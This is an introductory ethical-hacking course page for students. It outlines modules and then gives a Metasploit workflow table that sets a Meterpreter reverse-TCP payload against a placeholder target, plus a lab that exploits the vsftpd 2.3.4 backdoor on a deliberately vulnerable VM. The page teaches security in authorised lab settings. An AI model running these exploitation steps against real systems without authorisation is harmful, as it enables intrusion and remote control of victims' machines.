Course Content
Understand the basics of ethical hacking and why it is important
Understanding the basics of ethical hacking helps students learn how hackers think and how cyber attacks happen. It teaches the importance of protecting systems, finding security weaknesses before criminals do, and keeping personal and organizational data safe. Ethical hacking is important because it helps build a safer digital world and prepares students for future careers in cybersecurity.
0/5
Learn about Reconnaissance & Footprinting
Students will learn about Reconnaissance is the first and most critical phase of any penetration test. This topic teaches students how to gather intelligence about a target legally — using both passive (non-intrusive) and active methods. Master this topic and you will think like a real attacker.
0/5
Explore Scanning, Exploitation & Post-Exploitation
This is the most technical and exciting topic of the course. Students will perform actual attack simulations in a controlled lab environment using industry-standard tools. Always practice ONLY on systems you own or have explicit permission to test.
0/5
Understand the Web Application Hacking & Career Preparation
Web application vulnerabilities are the #1 source of security breaches in modern organizations. This final topic teaches the OWASP Top 10 attacks, secure code review, and everything needed to land your first cybersecurity job or internship.
0/4
Introduction to Ethical Hacking for Students

Metasploit Architecture

  • Exploit — Code that takes advantage of a vulnerability
  • Payload — Code that runs on the target after exploitation (reverse shell, Meterpreter)
  • Auxiliary — Scanners, fuzzers, and information gathering modules
  • Post — Post-exploitation modules for privilege escalation, persistence
  • Encoder — Obfuscates payload to evade antivirus detection

 

Metasploit Basic Workflow

Step

Command

Description

1

msfconsole

Launch the Metasploit console

2

search <vulnerability>

Search for relevant exploit modules

3

use exploit/multi/handler

Select an exploit or handler module

4

show options

View required and optional parameters

5

set RHOSTS <target IP>

Set the target IP address

6

set PAYLOAD windows/meterpreter/reverse_tcp

Choose the payload

7

set LHOST <your IP>

Set your listener IP (for reverse connections)

8

exploit / run

Launch the attack

9

sessions -l

List all active sessions

10

sessions -i 1

Interact with session #1

 

Lab: Download Metasploitable 2 (intentionally vulnerable VM). Use Nmap to find open vulnerabilities, then use Metasploit to exploit vsftpd 2.3.4 backdoor. Document every step.

Be a Mentor

    Be Our Skilling Partner